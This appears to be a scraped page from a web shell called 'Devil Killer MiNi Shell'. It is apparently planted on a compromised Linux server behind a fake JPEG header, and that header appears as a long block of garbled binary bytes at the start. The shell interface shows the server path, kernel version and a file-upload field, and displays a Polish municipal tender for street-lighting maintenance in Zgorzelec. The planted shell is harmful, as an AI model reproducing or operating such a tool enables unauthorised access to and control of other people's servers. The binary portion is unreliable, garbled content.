JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240520/0033019201-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Bieżące utrzymanie i konserwacja publicznych instalacji oświetleniowych na terenie miasta Zgorzelec oraz montaż i demontaż iluminacji świątecznych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miejska Zgorzelec</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">GM Zgorzelec</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 230821546</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Domańskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Zgorzelec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">59-900</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL515 - Jeleniogórski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">urzad@zgorzelec.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.um-zgorzelec.dolnyslask.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Bieżące utrzymanie i konserwacja publicznych instalacji oświetleniowych na terenie miasta Zgorzelec oraz montaż i demontaż iluminacji świątecznych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1dfb3bf6-1281-11ef-a7f7-6221b72ad4fc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00330192</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00078691/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Bieżące utrzymanie i konserwacja publicznych instalacji oświetleniowych i sygnalizatorów na terenie miasta Zgorzelec oraz montaż i demontaż iluminacji świątecznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/927397 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/zgorzelec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.	Postępowanie prowadzone jest w języku polskim w formie elektronicznej za pośrednictwem platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zgorzelec <br/>2.	W celu skrócenia czasu udzielenia odpowiedzi na pytania preferuje się, aby komunikacja między zamawiającym a wykonawcami w zakresie, o którym mowa w Rozdziale XIII ust. 3 SWZ, odbywa się za pośrednictwem platformazakupowa.pl i formularza „Wyślij wiadomość do zamawiającego”, z uwzględnieniem zapisów Rozdziału XIV SWZ. Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich przesłania za pośrednictwem platformazakupowa.pl poprzez kliknięcie przycisku „Wyślij wiadomość do zamawiającego” po których pojawi się komunikat, że wiadomość została wysłana do zamawiającego.<br/>3.	Zamawiający i Wykonawcy mogą również komunikować się za pomocą poczty elektronicznej, jak niżej:<br/>1)	Wykonawca na adres e-mail Zamawiającego: k.mroz@zgorzelec.eu<br/>Zamawiający (za pośrednictwem służbowej poczty e-mail osoby uprawnionej do komunikowania się z Wykonawcą k.mroz@zgorzelec.eu) – na adres e-mail wskazany do korespondencji w ofercie Wykonawcy.<br/>4.	Zamawiający, zgodnie z § 11 ust. 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie zamieszcza wymagania dotyczące specyfikacji połączenia, formatu przesyłanych danych oraz szyfrowania i oznaczania czasu przekazania i odbioru danych za pośrednictwem platformazakupowa.pl, tj.:<br/>1)	stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s,<br/>2)	komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>3)	zainstalowana dowolna przeglądarka internetowa, w przypadku Internet Explorer minimalnie wersja 10.0,<br/>4)	włączona obsługa JavaScript,<br/>5)	zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>6)	szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3,<br/>7)	Oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>5.	Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego:<br/>1)	akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na stronie internetowej pod linkiem w zakładce „Regulamin&#34; oraz uznaje go za wiążący,<br/>2)	zapoznał i stosuje się do Instrukcji składania ofert/wniosków dostępnej pod linkiem. <br/>6.	Zamawiający nie przewiduje sposobu komunikowania się z wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej.<br/>7.	Oferta powinna być:<br/>1)	Sporządzona w języku polskim,<br/>2)	złożona przy użyciu środków komunikacji elektronicznej tzn. za pośrednictwem platformazakupowa.pl,<br/>3)	podpisana kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę/osoby upoważnioną/upoważnione.<br/>8.	Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB.<br/>9.	Rozszerzenia plików wykorzystywanych przez Wykonawców powinny być zgodne z Załącznikiem nr 2 do “Rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych”.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. <br/>w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) informujemy, że:<br/>1)	Administratorem Pani/Pana danych osobowych jest Urząd Miasta Zgorzelec, reprezentowany przez Burmistrza Miasta.<br/>2)	Administrator wyznaczył Inspektora Danych Osobowych, <br/>z którym można się kontaktować pod adresem e-mail: iodo@zgorzelec.eu <br/>3)	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, prowadzonym w trybie podstawowym, zgodnie z art. 275 pkt 1 ustawy Pzp.<br/>4)	Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 i art. 74 ustawy Pzp.<br/>5)	Pani/Pana dane osobowe będą przetwarzane w ramach dokumentacji prowadzonej przez Urząd Miasta Zgorzelec na podstawie przepisów prawa dotyczących archiwizacji, przez okres wskazany w ww. przepisach, tj. 5 lat dokumentacja zamówień publicznych oraz 10 lat umowy zawarte w wyniku postępowania w trybie zamówień publicznych.<br/>6)	Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego.<br/>7)	W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, w tym nie będą podlegać profilowaniu, stosownie do art. 22 RODO.<br/>8)	Posiada Pani/Pan:<br/>a)	Na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b)	Na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy <br/>w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników);<br/>c)	Na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych <br/>z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, <br/>o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d)	Prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; <br/>9)	Nie przysługuje Pani/Panu:<br/>a)	W związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b)	Prawo do przenoszenia danych osobowych, o którym mowa <br/>w art. 20 RODO;<br/>c)	Na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO; <br/>10) Przysługuje Pani/Panu prawo wniesienia skargi do organu nadzorczego na niezgodne z RODO przetwarzanie Pani/Pana danych osobowych przez administratora. Organem właściwym dla przedmiotowej skargi jest Urząd Ochrony Danych Osobowych, <br/>ul. Stawki 2, 00-193 Warszawa.<br/>11) Jednocześnie Miasto Zgorzelec przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający pośrednio pozyska od Wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co najmniej jedno z wyłączeń, o których mowa <br/>w art. 14 ust. 5 RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WZP.271.1.19.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.Przedmiotem zamówienia jest usługa polegająca na utrzymaniu, konserwacji i wykonaniu bieżących napraw instalacji oraz urządzeń oświetlenia ulicznego wraz z montażem i demontażem oświetlenia świątecznego na terenie miasta Zgorzelec. 2.Przedmiot zamówienia obejmuje 3349 szt. opraw, 2901 szt. słupów oraz 64 szt. szaf oświetleniowych (stan na dzień 20.03.2024 r.), zgodnie z wykazem punktów świetlnych oraz mapą poglądową - Załącznik nr 6 do SWZ. Zamawiający zastrzega możliwość zmiany stanu ilościowego punktów oświetleniowych w następstwie budowy, przebudowy, rozbudowy, remontu oraz likwidacji. Każda zmiana zostanie skorygowana na podstawie protokołu zdawczo-odbiorczego. 3.Czynności określone w ust. 1 niniejszego Rozdziału dotyczą następujących rodzajów instalacji oświetleniowej: oświetlenia ulicznego (sieć wydzielona kablowa i napowietrzna, sieć wspólna z siecią rozdzielczą n/n TAURON S.A.), oświetlenia drogowego, oświetlenia parkowego.4.Zakres przedmiotu zamówienia w szczególności obejmuje:1) Zapewnienie sprawnego i prawidłowego funkcjonowania urządzeń i instalacji oświetleniowych; 2)Utrzymanie instalacji i urządzeń oświetleniowych w stanie gwarantującym pełne bezpieczeństwo wszystkim użytkownikom; 3)Konserwację instalacji i urządzeń oświetlenia; 4)Obsługę i przeglądy techniczne urządzeń aparatury zasilającej i zabezpieczającej, pomiarowej i sterowniczej w szafkach oświetleniowych; 5)Utrzymywanie słupów, szaf, złącz kablowych elewacyjnych w stanie estetycznym i czystym (czyszczenie opraw, systemów optycznych, mycie kloszy) oraz usuwanie ogłoszeń, plakatów oraz graffiti z powyższych urządzeń; 6)Regulację położenia opraw i odbłyśników, kontrole stanu słupów oświetleniowych poprzez:a)Sprawdzanie połączeń na tabliczce zaciskowej, oczyszczanie śrub, podkładek, nakrętek i końcówek kablowych, b)Sprawdzanie rodzaju i wielkości zabezpieczeń, w razie konieczności – ich wymiana lub uzupełnienie (w tym także wymiana zabezpieczeń w przypadku zmiany mocy umownych), c)Uzupełnienie zamknięć wnęk słupowych każdego typu, d)Sprawdzanie posadowienia i przywracanie pionowości słupów, zabezpieczenie oraz uzupełnianie fundamentów latarń i powierzchni słupów betonowych; 7)Pomiary i badania eksploatacyjne wykonane jednorazowo na pisemne żądanie Zamawiającego, poprzez: a)Sprawdzenie stanu technicznego i pomiar skuteczności ochrony przeciwpożarowej, b)Pomiary stanu rezystencji izolacji, c)Sprawdzanie oporności uziemień roboczych; Dokonanie powyższych czynności zostanie potwierdzone protokołem sporządzonym przez Wykonawcę, który zostanie przekazany Zamawiającemu wraz z fakturą z miesiąca wykonania. 8)Wykonywanie w sposób stały i nieprzerwany całodobowego dozoru technicznego nad instalacjami i urządzeniami oświetlenia; 9)Przyjmowanie i rejestracja zgłoszeń o usterkach, uszkodzeniach i awariach oświetlenia; 10)Wykonywanie na każde wezwanie Zamawiającego włączeń i wyłączeń oświetlenia drogowego we wskazanych punktach oraz informowanie przedstawicieli Zmawiającego o dokonanej czynności;11)Przedstawienie Zamawiającemu na każde wezwanie wykazu szaf oświetlenia ulicznego wraz z oznaczeniem rodzaju zamontowanego zegara astronomicznego oraz wskazanie ujętych ulic przynależnych do szafy oświetleniowej; 12)Informowanie przedstawicieli Zamawiającego pisemnie, pocztą elektroniczną, o: a)Włączeniach oświetlenia poza godzinami świecenia, b)Usuwanych usterkach, szkodach i awariach oświetlenia, c)Nieczynnym oświetleniu w porze nocnej, d)Awarii sieci zasilającej oświetlenie. 13)Lokalizowanie i usuwanie nielegalnych podłączeń do sieci oświetleniowej, z każdorazowym pisemnym (pocztą elektroniczną) powiadomieniem Zamawiającego o tym zdarzeniu; 14)Malowanie i konserwację metalowych konstrukcji słupów oświetleniowych, tablic rozdzielczych i szafek oraz uzupełnienie numeracji słupów oświetleniowych – każdorazowo na pisemne (przesłane pocztą elektroniczną) żądanie Zamawiającego; 15)Utylizację materiałów, które nie nadają się do dalszej eksploatacji (zużytych źródeł światła, opraw, elementów sterowania, zabezpieczeń itp.), zgodnie z przepisami prawa. Ocena braku przydatności wyeksploatowanych elementów musi zostać dokonana przy udziale przedstawicieli Zamawiającego (stanowisko przedstawicieli Zamawiającego jest dla Wykonawcy wiążące); 16)Przekazywanie Zamawiającemu comiesięcznych raportów odnośnie szkód wyrządzonych przez osoby trzecie na instalacji oraz urządzeniach oświetlenia; 17)Montaż w okresie przedświątecznym i demontaż po tym okresie iluminacji świątecznej na slupach energetycznych, tj ok 150 szt. Wraz z 6 szt. Sznurów (przewieszek) oraz innych iluminacji świątecznych tj. 2 szt. Choinek typu stożek ( o wysokości 9 i 2,5 metra),iluminacji w postaci anioła oraz renifera z saniami we wskazanych przez Zamawiającego miejscach. Zamawiający zastrzega, iż ww. ilość może ulec zmianie; 18)Montaż i demontaż ok. 80 szt. flag państwowych, ok. 50 szt. flag miejskich oraz ok. 45 szt. Flag okolicznościowych we wskazanym miejscu i czasie przez Zamawiającego. Zamawiający zastrzega iż ww. ilość może ulec zmianie; 19)Wykonywanie innych czynności, na pisemne żądanie Zamawiającego, takich jak: a)Uzupełnianie oraz zabezpieczanie cokołów pod szafkami sterowniczymi, b)Sprawdzanie stanu linek nośnych oraz zacisków, c)Sprawdzanie stanu technicznego aparatury sterowniczej i nastawianie zegarów sterujących, d)Wymiana lub montaż tabliczek informacyjnych i ostrzegawczych, e)Przycinanie gałęzi lub konarów drzew zasłaniających oprawy oświetleniowe oraz wrastające w linie napowietrzne – po uzyskaniu wymaganych prawem zezwoleń. 5.Przedmiot zamówienie obejmuje także prace związane z wymianą urządzeń oświetlenia ulicznego uszkodzonych w wyniku awarii, wypadków komunikacyjnych, dewastacji oraz innych zdarzeń losowych. Zakres prac obejmuje w szczególności: wymianę opraw, wysięgników, słupów, fundamentów, przewodów zasilających, szaf oświetlenia drogowego, zegarów astronomicznych. Wykonawca zobowiązany jest także do demontażu uszkodzonych urządzeń oświetlenia oraz montażu w ich miejsce nowych. Wymiana wszystkich urządzeń oświetlenia obejmuje również wykonanie prac przyłączeniowych i instalacyjnych niezbędnych do prawidłowego funkcjonowania przedmiotowych urządzeń. 6.Prace, o których mowa w ust. 5 niniejszego Rozdziału Wykonawca zobowiązany będzie wykonywać sukcesywnie, według bieżących potrzeb, na podstawie zleceń przekazanego w formie pisemnej lub za pośrednictwem poczty elektronicznej, zawierających w szczególności: lokalizację, rodzaj, zakres prac, wartość prac oraz termin ich wykonania. Szacunkowa ilość prac została określona w Kosztorysie ofertowym, stanowiącym Załącznik nr 1A do SWZ. Zamawiający zastrzega sobie możliwość zwiększenia lub zmniejszenia ilości dodatkowych prac do zrealizowania, wymienionych w Kosztorysie ofertowym, przy czym w przypadku zwiększenia ilości robót łączne wynagrodzenie Wykonawcy nie może przekroczyć zaoferowanego przez Wykonawcę maksymalnego wynagrodzenia kosztorysowego brutto, natomiast w przypadku zmniejszenia ilości robót Zamawiający zapewnia realizację robót w ramach przedmiotu niniejszej umowy na wartość nie mniejszą niż 60% zaoferowanego maksymalnego wynagrodzenia kosztorysowego brutto. 7.Szczegółowy opis i zakres przedmiotu zamówienia, o którym mowa w ust. 5 niniejszego Rozdziału został zawarty w Specyfikacji technicznej wykonania i odbioru robót budowlanych oraz w dokumentacji projektowej, w skład której wchodzi: 1)Przedmiar robót (przedmiar robót ma charakter pomocniczy), 2)Informacja do planu bezpieczeństwa i ochrony zdrowia, - zwanymi w dalszej części SWZ „dokumentacją” - Załącznik nr 7 do SWZ. 8.Wszędzie, gdzie opisane są instalacje i urządzenia oświetlenia należy również przez to rozumieć instalacje i urządzenia oświetlania dróg, ulic, parków, placów, skwerów, mostów. 9.Wykonawca zobowiązany jest do zapewnienia na własny koszt materiałów eksploatacyjnych niezbędnych do prawidłowej realizacji przedmiotu zamówienia. 10.Wymagania jakościowe odnoszące się do głównych elementów składających się na przedmiot zamówienia: 1)Użyte materiały i wymieniane elementy instalacji i urządzeń oświetlenia winny być wysokiej jakości, nie gorsze niż dotychczas zastosowane. W pierwszej kolejności należy stosować materiały i elementy tego samego producenta, które zastosowano przy budowie oświetlenia. W przypadku braku dostępności materiałów i elementów identycznych, dopuszcza się zastosowanie materiałów o podobnych, nie gorszych parametrach; 2)Słupy oświetleniowe nie mogą być odchylone od pionu więcej niż 2%; 3)Kable elektryczne, obwody i inne elementy powinny być testowane zgodnie z krajowymi wymogami, w sposób zapewniający spełnienie norm bezpieczeństwa instalacji elektrycznych; 4)Zastosowane farby do pomalowania metalowych konstrukcji słupów oświetleniowych, tablic rozdzielczych i szafek winny być dostosowane odpowiednio do materiału, z którego są wykonane malowane konstrukcje; 5)Ustawianie zegarów sterujących włączaniem i wyłączaniem oświetlenia winno być nakierowane na oszczędności zużycia energii elektrycznej. Czas działania oświetlenia nie może być dłuższy więcej niż o 1 godzinę niezbędnego oświetlenia obiektu; 6)Detergenty zastosowane do mycia słupów i opraw nie mogą być wylewane na tereny zieleni, lecz winny być zutylizowane zgodnie z obowiązującymi przepisami. 11.Szczegółowy opis i zakres przedmiotu zamówienia został zawarty w projekcie umowy - Załącznik nr 5 do SWZ. 12.Wymagania dotyczące gwarancji zleconych prac dodatkowych: Zamawiający wymaga udzielenia min. 36 miesięcznego okresu gwarancji na wykonane prace w zakresie wymiany urządzeń oświetleniowych uszkodzonych w wyniku awarii, wypadków komunikacyjnych, dewastacji i zdarzeń losowych. 